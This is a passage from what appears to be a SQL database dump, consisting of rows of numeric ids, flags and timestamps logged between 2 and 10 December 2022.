15:22:13'),(65385,4416,1,'2022-12-02','2022-12-02 15:29:41'),(65386,108,1,'2022-12-02','2022-12-02 16:19:01'),(65387,1584,1,'2022-12-02','2022-12-02 16:20:48'),(65388,2769,1,'2022-12-02','2022-12-02 16:36:11'),(65389,1602,1,'2022-12-02','2022-12-02 16:52:15'),(65390,4963,1,'2022-12-02','2022-12-02 17:20:28'),(65391,4654,1,'2022-12-02','2022-12-02 18:09:18'),(65392,1608,1,'2022-12-02','2022-12-02 18:55:10'),(65393,1594,1,'2022-12-02','2022-12-02 19:07:32'),(65394,91,1,'2022-12-02','2022-12-02 19:09:02'),(65395,2658,1,'2022-12-02','2022-12-02 19:10:07'),(65396,91,1,'2022-12-02','2022-12-02 19:11:13'),(65397,5153,1,'2022-12-02','2022-12-02 19:12:01'),(65398,5153,1,'2022-12-02','2022-12-02 19:12:01'),(65399,1596,1,'2022-12-02','2022-12-02 20:05:25'),(65400,1596,1,'2022-12-02','2022-12-02 20:06:13'),(65401,4428,1,'2022-12-02','2022-12-02 20:25:17'),(65402,3664,1,'2022-12-02','2022-12-02 20:51:14'),(65403,80,1,'2022-12-02','2022-12-02 21:08:55'),(65404,4759,1,'2022-12-02','2022-12-02 21:36:43'),(65405,4457,1,'2022-12-02','2022-12-02 21:44:12'),(65406,4485,1,'2022-12-02','2022-12-02 22:21:17'),(65407,1703,1,'2022-12-02','2022-12-02 22:33:34'),(65408,1602,1,'2022-12-03','2022-12-03 00:18:23'),(65409,4960,1,'2022-12-03','2022-12-03 01:12:17'),(65410,1745,1,'2022-12-03','2022-12-03 02:50:49'),(65411,1745,1,'2022-12-03','2022-12-03 02:50:50'),(65412,1745,1,'2022-12-03','2022-12-03 02:56:01'),(65413,1612,1,'2022-12-03','2022-12-03 03:05:10'),(65414,68,1,'2022-12-03','2022-12-03 03:07:47'),(65415,68,1,'2022-12-03','2022-12-03 03:09:15'),(65416,80,1,'2022-12-03','2022-12-03 03:09:21'),(65417,84,1,'2022-12-03','2022-12-03 03:09:46'),(65418,1602,1,'2022-12-03','2022-12-03 03:16:54'),(65419,3117,1,'2022-12-03','2022-12-03 03:39:18'),(65420,4719,1,'2022-12-03','2022-12-03 03:50:31'),(65421,1705,1,'2022-12-03','2022-12-03 04:01:56'),(65422,2410,1,'2022-12-03','2022-12-03 04:46:43'),(65423,4694,1,'2022-12-03','2022-12-03 05:09:16'),(65424,2309,1,'2022-12-03','2022-12-03 06:51:15'),(65425,2309,1,'2022-12-03','2022-12-03 06:52:56'),(65426,2904,1,'2022-12-03','2022-12-03 07:11:11'),(65427,4759,1,'2022-12-03','2022-12-03 08:03:15'),(65428,4412,1,'2022-12-03','2022-12-03 09:11:08'),(65429,4412,1,'2022-12-03','2022-12-03 09:11:18'),(65430,4412,1,'2022-12-03','2022-12-03 09:23:02'),(65431,1594,1,'2022-12-03','2022-12-03 10:52:57'),(65432,68,1,'2022-12-03','2022-12-03 10:55:12'),(65433,1594,1,'2022-12-03','2022-12-03 10:55:56'),(65434,1614,1,'2022-12-03','2022-12-03 11:04:47'),(65435,2809,1,'2022-12-03','2022-12-03 11:54:14'),(65436,5163,1,'2022-12-03','2022-12-03 13:34:39'),(65437,1544,1,'2022-12-03','2022-12-03 13:47:19'),(65438,91,1,'2022-12-03','2022-12-03 13:48:11'),(65439,4412,1,'2022-12-03','2022-12-03 14:06:30'),(65440,1596,1,'2022-12-03','2022-12-03 14:47:11'),(65441,1596,1,'2022-12-03','2022-12-03 14:47:44'),(65442,4335,1,'2022-12-03','2022-12-03 14:54:30'),(65443,4542,1,'2022-12-03','2022-12-03 15:11:57'),(65444,5071,1,'2022-12-03','2022-12-03 15:24:19'),(65445,4911,1,'2022-12-03','2022-12-03 15:40:50'),(65446,4747,1,'2022-12-03','2022-12-03 15:54:21'),(65447,4960,1,'2022-12-03','2022-12-03 16:29:04'),(65448,4960,1,'2022-12-03','2022-12-03 16:37:02'),(65449,74,1,'2022-12-03','2022-12-03 16:37:32'),(65450,4960,1,'2022-12-03','2022-12-03 16:37:45'),(65451,3226,1,'2022-12-03','2022-12-03 16:39:17'),(65452,4960,1,'2022-12-03','2022-12-03 17:29:07'),(65453,4960,1,'2022-12-03','2022-12-03 17:39:26'),(65454,3004,1,'2022-12-03','2022-12-03 17:47:05'),(65455,4529,1,'2022-12-03','2022-12-03 18:09:16'),(65456,2991,1,'2022-12-03','2022-12-03 19:04:40'),(65457,1544,1,'2022-12-03','2022-12-03 19:37:47'),(65458,1722,1,'2022-12-03','2022-12-03 20:59:24'),(65459,3087,1,'2022-12-03','2022-12-03 23:19:56'),(65460,1707,1,'2022-12-04','2022-12-04 01:36:08'),(65461,3486,1,'2022-12-04','2022-12-04 03:21:01'),(65462,3498,1,'2022-12-04','2022-12-04 03:55:50'),(65463,4457,1,'2022-12-04','2022-12-04 04:26:17'),(65464,1586,1,'2022-12-04','2022-12-04 05:08:04'),(65465,3735,1,'2022-12-04','2022-12-04 07:41:07'),(65466,4756,1,'2022-12-04','2022-12-04 07:41:18'),(65467,3735,1,'2022-12-04','2022-12-04 07:41:35'),(65468,1586,1,'2022-12-04','2022-12-04 09:03:57'),(65469,1586,1,'2022-12-04','2022-12-04 09:03:57'),(65470,1586,1,'2022-12-04','2022-12-04 09:07:20'),(65471,4762,1,'2022-12-04','2022-12-04 09:58:35'),(65472,3226,1,'2022-12-04','2022-12-04 10:46:54'),(65473,4323,1,'2022-12-04','2022-12-04 11:22:25'),(65474,3752,1,'2022-12-04','2022-12-04 11:22:25'),(65475,4335,1,'2022-12-04','2022-12-04 11:28:37'),(65476,3498,1,'2022-12-04','2022-12-04 11:57:43'),(65477,89,1,'2022-12-04','2022-12-04 14:31:40'),(65478,472,1,'2022-12-04','2022-12-04 16:01:41'),(65479,2809,1,'2022-12-04','2022-12-04 16:46:30'),(65480,1722,1,'2022-12-04','2022-12-04 17:20:25'),(65481,4762,1,'2022-12-04','2022-12-04 18:16:34'),(65482,4391,1,'2022-12-04','2022-12-04 18:53:57'),(65483,1586,1,'2022-12-04','2022-12-04 19:14:45'),(65484,1586,1,'2022-12-04','2022-12-04 19:14:46'),(65485,1586,1,'2022-12-04','2022-12-04 19:17:51'),(65486,1614,1,'2022-12-04','2022-12-04 22:54:28'),(65487,4391,1,'2022-12-04','2022-12-04 23:00:43'),(65488,3079,1,'2022-12-04','2022-12-04 23:02:15'),(65489,3079,1,'2022-12-04','2022-12-04 23:03:14'),(65490,3079,1,'2022-12-04','2022-12-04 23:03:22'),(65491,3079,1,'2022-12-04','2022-12-04 23:03:57'),(65492,2813,1,'2022-12-04','2022-12-04 23:16:43'),(65493,2801,1,'2022-12-04','2022-12-04 23:19:30'),(65494,2813,1,'2022-12-04','2022-12-04 23:19:58'),(65495,2813,1,'2022-12-04','2022-12-04 23:20:34'),(65496,1614,1,'2022-12-04','2022-12-04 23:30:40'),(65497,4485,1,'2022-12-04','2022-12-04 23:36:31'),(65498,3486,1,'2022-12-04','2022-12-04 23:51:02'),(65499,1544,1,'2022-12-05','2022-12-05 00:11:59'),(65500,4485,1,'2022-12-05','2022-12-05 01:06:37'),(65501,1544,1,'2022-12-05','2022-12-05 01:12:40'),(65502,2419,1,'2022-12-05','2022-12-05 02:08:44'),(65503,2809,1,'2022-12-05','2022-12-05 02:25:34'),(65504,4738,1,'2022-12-05','2022-12-05 02:44:49'),(65505,1730,1,'2022-12-05','2022-12-05 03:44:19'),(65506,4323,1,'2022-12-05','2022-12-05 04:12:23'),(65507,4323,1,'2022-12-05','2022-12-05 04:14:34'),(65508,106,1,'2022-12-05','2022-12-05 05:33:27'),(65509,3664,1,'2022-12-05','2022-12-05 05:58:34'),(65510,1594,1,'2022-12-05','2022-12-05 07:37:43'),(65511,1594,1,'2022-12-05','2022-12-05 07:38:44'),(65512,4756,1,'2022-12-05','2022-12-05 08:14:37'),(65513,4756,1,'2022-12-05','2022-12-05 08:14:54'),(65514,1596,1,'2022-12-05','2022-12-05 08:37:20'),(65515,1596,1,'2022-12-05','2022-12-05 08:39:47'),(65516,4944,1,'2022-12-05','2022-12-05 09:36:49'),(65517,4741,1,'2022-12-05','2022-12-05 09:40:39'),(65518,4744,1,'2022-12-05','2022-12-05 10:08:03'),(65519,2410,1,'2022-12-05','2022-12-05 10:23:33'),(65520,2457,1,'2022-12-05','2022-12-05 10:26:33'),(65521,1544,1,'2022-12-05','2022-12-05 10:26:58'),(65522,2457,1,'2022-12-05','2022-12-05 10:27:10'),(65523,4762,1,'2022-12-05','2022-12-05 10:30:01'),(65524,1596,1,'2022-12-05','2022-12-05 10:35:36'),(65525,4457,1,'2022-12-05','2022-12-05 10:51:57'),(65526,4765,1,'2022-12-05','2022-12-05 10:54:43'),(65527,4765,1,'2022-12-05','2022-12-05 10:54:49'),(65528,5062,1,'2022-12-05','2022-12-05 11:05:46'),(65529,4771,1,'2022-12-05','2022-12-05 11:19:25'),(65530,4771,1,'2022-12-05','2022-12-05 11:22:58'),(65531,5062,1,'2022-12-05','2022-12-05 12:04:38'),(65532,5163,1,'2022-12-05','2022-12-05 13:06:39'),(65533,1588,1,'2022-12-05','2022-12-05 13:08:42'),(65534,80,1,'2022-12-05','2022-12-05 13:16:56'),(65535,3486,1,'2022-12-05','2022-12-05 14:04:45'),(65536,2309,1,'2022-12-05','2022-12-05 14:28:19'),(65537,1600,1,'2022-12-05','2022-12-05 14:31:15'),(65538,2809,1,'2022-12-05','2022-12-05 15:02:16'),(65539,1604,1,'2022-12-05','2022-12-05 15:26:23'),(65540,1600,1,'2022-12-05','2022-12-05 15:29:08'),(65541,87,1,'2022-12-05','2022-12-05 15:39:36'),(65542,5071,1,'2022-12-05','2022-12-05 15:42:00'),(65543,4420,1,'2022-12-05','2022-12-05 16:13:11'),(65544,84,1,'2022-12-05','2022-12-05 16:18:29'),(65545,72,1,'2022-12-05','2022-12-05 16:19:05'),(65546,84,1,'2022-12-05','2022-12-05 16:19:49'),(65547,4420,1,'2022-12-05','2022-12-05 16:19:50'),(65548,2609,1,'2022-12-05','2022-12-05 16:23:17'),(65549,2609,1,'2022-12-05','2022-12-05 16:23:40'),(65550,2609,1,'2022-12-05','2022-12-05 16:23:50'),(65551,1614,1,'2022-12-05','2022-12-05 17:17:49'),(65552,4911,1,'2022-12-05','2022-12-05 20:10:52'),(65553,4911,1,'2022-12-05','2022-12-05 20:13:59'),(65554,3079,1,'2022-12-05','2022-12-05 22:03:59'),(65555,3079,1,'2022-12-05','2022-12-05 22:04:36'),(65556,1610,1,'2022-12-05','2022-12-05 22:06:45'),(65557,3079,1,'2022-12-05','2022-12-05 22:06:50'),(65558,1610,1,'2022-12-05','2022-12-05 22:08:16'),(65559,3079,1,'2022-12-05','2022-12-05 22:32:43'),(65560,4420,1,'2022-12-05','2022-12-05 23:47:58'),(65561,2904,1,'2022-12-05','2022-12-05 23:58:11'),(65562,2809,1,'2022-12-06','2022-12-06 00:04:17'),(65563,2809,1,'2022-12-06','2022-12-06 00:39:09'),(65564,1582,1,'2022-12-06','2022-12-06 01:14:13'),(65565,5157,1,'2022-12-06','2022-12-06 01:24:53'),(65566,4391,1,'2022-12-06','2022-12-06 02:22:35'),(65567,1600,1,'2022-12-06','2022-12-06 03:27:48'),(65568,485,1,'2022-12-06','2022-12-06 06:56:47'),(65569,4582,1,'2022-12-06','2022-12-06 08:05:45'),(65570,3109,1,'2022-12-06','2022-12-06 08:06:12'),(65571,1608,1,'2022-12-06','2022-12-06 08:20:02'),(65572,4960,1,'2022-12-06','2022-12-06 09:20:59'),(65573,1766,1,'2022-12-06','2022-12-06 10:00:39'),(65574,1766,1,'2022-12-06','2022-12-06 10:01:02'),(65575,1766,1,'2022-12-06','2022-12-06 10:01:35'),(65576,1608,1,'2022-12-06','2022-12-06 10:28:08'),(65577,2558,1,'2022-12-06','2022-12-06 10:28:29'),(65578,1766,1,'2022-12-06','2022-12-06 10:28:38'),(65579,1766,1,'2022-12-06','2022-12-06 10:28:52'),(65580,1766,1,'2022-12-06','2022-12-06 10:33:27'),(65581,1766,1,'2022-12-06','2022-12-06 10:33:32'),(65582,1766,1,'2022-12-06','2022-12-06 10:35:50'),(65583,1766,1,'2022-12-06','2022-12-06 10:35:57'),(65584,1766,1,'2022-12-06','2022-12-06 10:36:01'),(65585,1766,1,'2022-12-06','2022-12-06 10:36:14'),(65586,5163,1,'2022-12-06','2022-12-06 10:37:02'),(65587,4771,1,'2022-12-06','2022-12-06 10:52:42'),(65588,4960,1,'2022-12-06','2022-12-06 11:09:50'),(65589,1728,1,'2022-12-06','2022-12-06 11:12:25'),(65590,4335,1,'2022-12-06','2022-12-06 12:06:00'),(65591,76,1,'2022-12-06','2022-12-06 12:08:28'),(65592,4335,1,'2022-12-06','2022-12-06 12:10:46'),(65593,1584,1,'2022-12-06','2022-12-06 12:38:11'),(65594,1582,1,'2022-12-06','2022-12-06 12:40:19'),(65595,3107,1,'2022-12-06','2022-12-06 14:14:20'),(65596,2419,1,'2022-12-06','2022-12-06 14:46:47'),(65597,2609,1,'2022-12-06','2022-12-06 14:54:40'),(65598,1602,1,'2022-12-06','2022-12-06 15:20:38'),(65599,80,1,'2022-12-06','2022-12-06 15:20:45'),(65600,80,1,'2022-12-06','2022-12-06 15:22:41'),(65601,1586,1,'2022-12-06','2022-12-06 16:40:26'),(65602,1722,1,'2022-12-06','2022-12-06 16:42:51'),(65603,1718,1,'2022-12-06','2022-12-06 16:55:04'),(65604,4238,1,'2022-12-06','2022-12-06 17:26:40'),(65605,4911,1,'2022-12-06','2022-12-06 17:45:03'),(65606,1582,1,'2022-12-06','2022-12-06 18:36:44'),(65607,1544,1,'2022-12-06','2022-12-06 19:48:44'),(65608,1770,1,'2022-12-06','2022-12-06 21:52:39'),(65609,4960,1,'2022-12-06','2022-12-06 22:54:21'),(65610,2813,1,'2022-12-06','2022-12-06 23:30:22'),(65611,4762,1,'2022-12-06','2022-12-06 23:58:38'),(65612,1606,1,'2022-12-07','2022-12-07 00:24:19'),(65613,472,1,'2022-12-07','2022-12-07 00:43:32'),(65614,3691,1,'2022-12-07','2022-12-07 00:47:27'),(65615,4762,1,'2022-12-07','2022-12-07 00:55:31'),(65616,1582,1,'2022-12-07','2022-12-07 01:24:37'),(65617,3691,1,'2022-12-07','2022-12-07 01:36:30'),(65618,3486,1,'2022-12-07','2022-12-07 01:39:54'),(65619,4485,1,'2022-12-07','2022-12-07 01:41:27'),(65620,1600,1,'2022-12-07','2022-12-07 01:55:35'),(65621,3486,1,'2022-12-07','2022-12-07 01:58:32'),(65622,3060,1,'2022-12-07','2022-12-07 02:15:10'),(65623,2248,1,'2022-12-07','2022-12-07 02:24:00'),(65624,4694,1,'2022-12-07','2022-12-07 02:36:52'),(65625,3691,1,'2022-12-07','2022-12-07 02:42:37'),(65626,2809,1,'2022-12-07','2022-12-07 02:53:33'),(65627,4941,1,'2022-12-07','2022-12-07 03:09:00'),(65628,4485,1,'2022-12-07','2022-12-07 03:11:25'),(65629,473,1,'2022-12-07','2022-12-07 03:29:57'),(65630,473,1,'2022-12-07','2022-12-07 03:30:50'),(65631,473,1,'2022-12-07','2022-12-07 03:31:23'),(65632,5163,1,'2022-12-07','2022-12-07 04:21:56'),(65633,3038,1,'2022-12-07','2022-12-07 07:00:49'),(65634,4996,1,'2022-12-07','2022-12-07 07:47:52'),(65635,4582,1,'2022-12-07','2022-12-07 08:31:29'),(65636,4582,1,'2022-12-07','2022-12-07 08:31:33'),(65637,4944,1,'2022-12-07','2022-12-07 08:38:28'),(65638,472,1,'2022-12-07','2022-12-07 08:49:45'),(65639,3691,1,'2022-12-07','2022-12-07 09:54:18'),(65640,4608,1,'2022-12-07','2022-12-07 10:13:22'),(65641,5163,1,'2022-12-07','2022-12-07 10:13:41'),(65642,5163,1,'2022-12-07','2022-12-07 10:13:55'),(65643,1751,1,'2022-12-07','2022-12-07 10:31:47'),(65644,4412,1,'2022-12-07','2022-12-07 10:39:17'),(65645,5062,1,'2022-12-07','2022-12-07 10:50:23'),(65646,5028,1,'2022-12-07','2022-12-07 10:51:36'),(65647,5028,1,'2022-12-07','2022-12-07 10:52:06'),(65648,4944,1,'2022-12-07','2022-12-07 10:53:36'),(65649,4960,1,'2022-12-07','2022-12-07 11:01:53'),(65650,3253,1,'2022-12-07','2022-12-07 11:05:25'),(65651,3253,1,'2022-12-07','2022-12-07 11:05:34'),(65652,3253,1,'2022-12-07','2022-12-07 11:05:42'),(65653,3253,1,'2022-12-07','2022-12-07 11:05:55'),(65654,1604,1,'2022-12-07','2022-12-07 11:12:35'),(65655,1604,1,'2022-12-07','2022-12-07 11:13:41'),(65656,1718,1,'2022-12-07','2022-12-07 11:18:23'),(65657,4966,1,'2022-12-07','2022-12-07 11:36:52'),(65658,2609,1,'2022-12-07','2022-12-07 11:46:52'),(65659,470,1,'2022-12-07','2022-12-07 12:05:35'),(65660,1588,1,'2022-12-07','2022-12-07 12:08:31'),(65661,1588,1,'2022-12-07','2022-12-07 12:09:35'),(65662,5131,1,'2022-12-07','2022-12-07 12:46:12'),(65663,5131,1,'2022-12-07','2022-12-07 12:47:42'),(65664,5131,1,'2022-12-07','2022-12-07 12:48:55'),(65665,91,1,'2022-12-07','2022-12-07 12:54:53'),(65666,91,1,'2022-12-07','2022-12-07 13:16:31'),(65667,91,1,'2022-12-07','2022-12-07 13:16:51'),(65668,5146,1,'2022-12-07','2022-12-07 13:17:26'),(65669,5153,1,'2022-12-07','2022-12-07 13:17:26'),(65670,91,1,'2022-12-07','2022-12-07 13:42:18'),(65671,91,1,'2022-12-07','2022-12-07 13:42:43'),(65672,5146,1,'2022-12-07','2022-12-07 13:43:28'),(65673,5153,1,'2022-12-07','2022-12-07 13:43:28'),(65674,91,1,'2022-12-07','2022-12-07 14:04:03'),(65675,91,1,'2022-12-07','2022-12-07 14:07:44'),(65676,5163,1,'2022-12-07','2022-12-07 14:16:22'),(65677,1741,1,'2022-12-07','2022-12-07 14:44:47'),(65678,1741,1,'2022-12-07','2022-12-07 14:45:22'),(65679,4341,1,'2022-12-07','2022-12-07 15:55:28'),(65680,1602,1,'2022-12-07','2022-12-07 16:21:15'),(65681,1582,1,'2022-12-07','2022-12-07 17:51:59'),(65682,3691,1,'2022-12-07','2022-12-07 17:54:28'),(65683,1745,1,'2022-12-07','2022-12-07 18:01:31'),(65684,1582,1,'2022-12-07','2022-12-07 18:13:40'),(65685,2775,1,'2022-12-07','2022-12-07 18:30:27'),(65686,1544,1,'2022-12-07','2022-12-07 18:37:48'),(65687,1586,1,'2022-12-07','2022-12-07 18:49:32'),(65688,1588,1,'2022-12-07','2022-12-07 19:13:13'),(65689,3486,1,'2022-12-07','2022-12-07 19:17:26'),(65690,3764,1,'2022-12-07','2022-12-07 19:25:41'),(65691,4960,1,'2022-12-07','2022-12-07 19:34:33'),(65692,4657,1,'2022-12-07','2022-12-07 20:01:51'),(65693,1877,1,'2022-12-07','2022-12-07 20:03:27'),(65694,473,1,'2022-12-07','2022-12-07 20:03:27'),(65695,4326,1,'2022-12-07','2022-12-07 21:04:31'),(65696,2991,1,'2022-12-07','2022-12-07 22:16:50'),(65697,3069,1,'2022-12-07','2022-12-07 22:34:32'),(65698,3083,1,'2022-12-07','2022-12-07 22:38:47'),(65699,1705,1,'2022-12-07','2022-12-07 22:55:03'),(65700,91,1,'2022-12-07','2022-12-07 23:13:15'),(65701,3051,1,'2022-12-08','2022-12-08 00:51:08'),(65702,3664,1,'2022-12-08','2022-12-08 01:24:29'),(65703,1544,1,'2022-12-08','2022-12-08 02:10:58'),(65704,4520,1,'2022-12-08','2022-12-08 02:25:32'),(65705,3030,1,'2022-12-08','2022-12-08 03:05:28'),(65706,4457,1,'2022-12-08','2022-12-08 04:50:39'),(65707,1544,1,'2022-12-08','2022-12-08 04:54:45'),(65708,3259,1,'2022-12-08','2022-12-08 04:59:29'),(65709,1774,1,'2022-12-08','2022-12-08 05:13:09'),(65710,3764,1,'2022-12-08','2022-12-08 05:19:31'),(65711,4663,1,'2022-12-08','2022-12-08 07:34:33'),(65712,4657,1,'2022-12-08','2022-12-08 08:19:32'),(65713,2309,1,'2022-12-08','2022-12-08 09:04:30'),(65714,1594,1,'2022-12-08','2022-12-08 09:36:48'),(65715,472,1,'2022-12-08','2022-12-08 09:49:32'),(65716,4608,1,'2022-12-08','2022-12-08 09:56:17'),(65717,4587,1,'2022-12-08','2022-12-08 10:10:32'),(65718,4911,1,'2022-12-08','2022-12-08 10:32:47'),(65719,4911,1,'2022-12-08','2022-12-08 10:33:19'),(65720,2161,1,'2022-12-08','2022-12-08 12:56:00'),(65721,1586,1,'2022-12-08','2022-12-08 13:04:36'),(65722,91,1,'2022-12-08','2022-12-08 14:03:56'),(65723,5146,1,'2022-12-08','2022-12-08 14:19:30'),(65724,1582,1,'2022-12-08','2022-12-08 14:47:00'),(65725,4966,1,'2022-12-08','2022-12-08 15:01:37'),(65726,80,1,'2022-12-08','2022-12-08 15:03:19'),(65727,4966,1,'2022-12-08','2022-12-08 15:06:04'),(65728,3764,1,'2022-12-08','2022-12-08 15:07:17'),(65729,1582,1,'2022-12-08','2022-12-08 15:15:21'),(65730,3253,1,'2022-12-08','2022-12-08 15:40:18'),(65731,3253,1,'2022-12-08','2022-12-08 15:40:36'),(65732,3253,1,'2022-12-08','2022-12-08 15:41:19'),(65733,2159,1,'2022-12-08','2022-12-08 15:48:39'),(65734,2769,1,'2022-12-08','2022-12-08 15:49:34'),(65735,1606,1,'2022-12-08','2022-12-08 15:59:52'),(65736,1606,1,'2022-12-08','2022-12-08 16:00:08'),(65737,2309,1,'2022-12-08','2022-12-08 17:19:30'),(65738,472,1,'2022-12-08','2022-12-08 18:04:35'),(65739,4648,1,'2022-12-08','2022-12-08 18:49:46'),(65740,4654,1,'2022-12-08','2022-12-08 19:34:41'),(65741,4944,1,'2022-12-08','2022-12-08 20:05:56'),(65742,1544,1,'2022-12-08','2022-12-08 20:07:07'),(65743,4363,1,'2022-12-08','2022-12-08 20:24:24'),(65744,91,1,'2022-12-08','2022-12-08 20:33:58'),(65745,1606,1,'2022-12-08','2022-12-08 20:46:41'),(65746,1743,1,'2022-12-08','2022-12-08 20:50:12'),(65747,4404,1,'2022-12-08','2022-12-08 21:34:16'),(65748,4938,1,'2022-12-08','2022-12-08 21:36:16'),(65749,4966,1,'2022-12-08','2022-12-08 21:42:22'),(65750,4651,1,'2022-12-08','2022-12-08 22:32:08'),(65751,1745,1,'2022-12-08','2022-12-08 22:44:50'),(65752,4866,1,'2022-12-08','2022-12-08 23:02:14'),(65753,4866,1,'2022-12-08','2022-12-08 23:02:24'),(65754,4938,1,'2022-12-08','2022-12-08 23:06:27'),(65755,4866,1,'2022-12-08','2022-12-08 23:07:11'),(65756,4363,1,'2022-12-09','2022-12-09 00:30:45'),(65757,472,1,'2022-12-09','2022-12-09 02:46:52'),(65758,4363,1,'2022-12-09','2022-12-09 03:36:30'),(65759,2309,1,'2022-12-09','2022-12-09 04:22:02'),(65760,1606,1,'2022-12-09','2022-12-09 04:41:12'),(65761,4645,1,'2022-12-09','2022-12-09 05:00:20'),(65762,4485,1,'2022-12-09','2022-12-09 05:05:58'),(65763,467,1,'2022-12-09','2022-12-09 05:07:22'),(65764,1544,1,'2022-12-09','2022-12-09 05:09:37'),(65765,3721,1,'2022-12-09','2022-12-09 05:15:49'),(65766,4363,1,'2022-12-09','2022-12-09 05:29:19'),(65767,3285,1,'2022-12-09','2022-12-09 05:32:21'),(65768,4660,1,'2022-12-09','2022-12-09 05:37:08'),(65769,478,1,'2022-12-09','2022-12-09 06:37:34'),(65770,1766,1,'2022-12-09','2022-12-09 06:53:31'),(65771,4944,1,'2022-12-09','2022-12-09 07:00:08'),(65772,4960,1,'2022-12-09','2022-12-09 07:44:30'),(65773,1586,1,'2022-12-09','2022-12-09 07:52:42'),(65774,2769,1,'2022-12-09','2022-12-09 08:00:26'),(65775,68,1,'2022-12-09','2022-12-09 09:08:37'),(65776,80,1,'2022-12-09','2022-12-09 09:09:49'),(65777,335,1,'2022-12-09','2022-12-09 09:10:44'),(65778,5134,1,'2022-12-09','2022-12-09 09:12:15'),(65779,1598,1,'2022-12-09','2022-12-09 09:33:01'),(65780,1608,1,'2022-12-09','2022-12-09 09:35:21'),(65781,4363,1,'2022-12-09','2022-12-09 11:05:38'),(65782,4457,1,'2022-12-09','2022-12-09 11:29:49'),(65783,3285,1,'2022-12-09','2022-12-09 11:30:16'),(65784,91,1,'2022-12-09','2022-12-09 11:53:16'),(65785,2309,1,'2022-12-09','2022-12-09 12:29:34'),(65786,4363,1,'2022-12-09','2022-12-09 13:27:11'),(65787,467,1,'2022-12-09','2022-12-09 13:46:57'),(65788,2154,1,'2022-12-09','2022-12-09 14:25:43'),(65789,1544,1,'2022-12-09','2022-12-09 14:30:31'),(65790,1588,1,'2022-12-09','2022-12-09 14:44:32'),(65791,1606,1,'2022-12-09','2022-12-09 15:07:24'),(65792,72,1,'2022-12-09','2022-12-09 16:49:09'),(65793,1602,1,'2022-12-09','2022-12-09 16:59:41'),(65794,4444,1,'2022-12-09','2022-12-09 17:52:16'),(65795,1602,1,'2022-12-09','2022-12-09 18:22:02'),(65796,4363,1,'2022-12-09','2022-12-09 18:33:50'),(65797,1872,1,'2022-12-09','2022-12-09 18:37:53'),(65798,1870,1,'2022-12-09','2022-12-09 18:38:39'),(65799,1870,1,'2022-12-09','2022-12-09 18:39:09'),(65800,1877,1,'2022-12-09','2022-12-09 18:39:26'),(65801,473,1,'2022-12-09','2022-12-09 18:40:24'),(65802,3489,1,'2022-12-09','2022-12-09 19:07:48'),(65803,4651,1,'2022-12-09','2022-12-09 19:51:04'),(65804,2309,1,'2022-12-09','2022-12-09 19:52:10'),(65805,4657,1,'2022-12-09','2022-12-09 19:55:44'),(65806,4645,1,'2022-12-09','2022-12-09 20:00:25'),(65807,4654,1,'2022-12-09','2022-12-09 20:08:03'),(65808,4660,1,'2022-12-09','2022-12-09 20:16:46'),(65809,4648,1,'2022-12-09','2022-12-09 20:35:15'),(65810,2609,1,'2022-12-09','2022-12-09 20:38:45'),(65811,1600,1,'2022-12-09','2022-12-09 21:04:08'),(65812,2309,1,'2022-12-09','2022-12-09 21:22:06'),(65813,4938,1,'2022-12-09','2022-12-09 21:32:30'),(65814,5163,1,'2022-12-09','2022-12-09 21:47:09'),(65815,80,1,'2022-12-09','2022-12-09 21:47:19'),(65816,5163,1,'2022-12-09','2022-12-09 21:47:40'),(65817,80,1,'2022-12-09','2022-12-09 21:47:57'),(65818,5163,1,'2022-12-09','2022-12-09 21:49:06'),(65819,3285,1,'2022-12-09','2022-12-09 22:07:34'),(65820,4363,1,'2022-12-09','2022-12-09 22:55:59'),(65821,1544,1,'2022-12-09','2022-12-09 23:57:28'),(65822,1606,1,'2022-12-10','2022-12-10 00:23:12'),(65823,4960,1,'2022-12-10','2022-12-10 00:28:35'),(65824,1544,1,'2022-12-10','2022-12-10 00:41:44'),(65825,4363,1,'2022-12-10','2022-12-10 00:44:21'),(65826,4663,1,'2022-12-10','2022-12-10 01:07:00'),(65827,1544,1,'2022-12-10','2022-12-10 01:26:23'),(65828,4238,1,'2022-12-10','2022-12-10 02:10:38'),(65829,4238,1,'2022-12-10','2022-12-10 02:13:27'),(65830,80,1,'2022-12-10','2022-12-10 04:10:40'),(65831,4363,1,'2022-12-10','2022-12-10 04:12:31'),(65832,4706,1,'2022-12-10','2022-12-10 04:52:51'),(65833,4651,1,'2022-12-10','2022-12-10 06:33:02'),(65834,2813,1,'2022-12-10','2022-12-10 06:35:36'),(65835,4645,1,'2022-12-10','2022-12-10 07:10:23'),(65836,4363,1,'2022-12-10','2022-12-10 07:12:39'),(65837,4648,1,'2022-12-10','2022-12-10 08:04:13'),(65838,4363,1,'2022-12-10','2022-12-10 08:35:23'),(65839,2658,1,'2022-12-10','2022-12-10 08:35:23'),(65840,1544,1,'2022-12-10','2022-12-10 08:55:46'),(65841,472,1,'2022-12-10','2022-12-10 09:06:05'),(65842,1594,1,'2022-12-10','2022-12-10 09:55:35'),(65843,4323,1,'2022-12-10','2022-12-10 10:55:49'),(65844,4363,1,'2022-12-10','2022-12-10 10:59:23'),(65845,5163,1,'2022-12-10','2022-12-10 11:04:53'),(65846,472,1,'2022-12-10','2022-12-10 11:27:35'),(65847,4363,1,'2022-12-10','2022-12-10 11:33:50'),(65848,472,1,'2022-12-10','2022-12-10 11:39:15'),(65849,1614,1,'2022-12-10','2022-12-10 12:14:29'),(65850,469,1,'2022-12-10','2022-12-10 12:18:36'),(65851,2775,1,'2022-12-10','2022-12-10 12:40:43'),(65852,4966,1,'2022-12-10','2022-12-10 13:20:52'),(65853,5163,1,'2022-12-10','2022-12-10 14:47:20'),(65854,5163,1,'2022-12-10','2022-12-10 14:54:29'),(65855,5163,1,'2022-12-10','2022-12-10 14:55:28'),(65856,4363,1,'2022-12-10','2022-12-10 15:24:46'),(65857,4706,1,'2022-12-10','2022-12-10 15:31:05'),(65858,1728,1,'2022-12-10','2022-12-10 15:44:08'),(65859,1728,1,'2022-12-10','2022-12-10 15:44:13'),(65860,1728,1,'2022-12-10','2022-12-10 15:45:06'),(65861,1612,1,'2022-12-10','2022-12-10 15:54:47'),(65862,4966,1,'2022-12-10','2022-12-10 16:03:32'),(65863,473,1,'2022-12-10','2022-12-10 16:23:17'),(65864,4363,1,'2022-12-10','2022-12-10 16:47:08'),(65865,1596,1,'2022-12-10','2022-12-10 17:15:41'),(65866,1596,1,'2022-12-10','2022-12-10 17:17:59'),(65867,472,1,'2022-12-10','2022-12-10 17:21:58'),(65868,1614,1,'2022-12-10','2022-12-10 17:33:32'),(65869,1582,1,'2022-12-10','2022-12-10 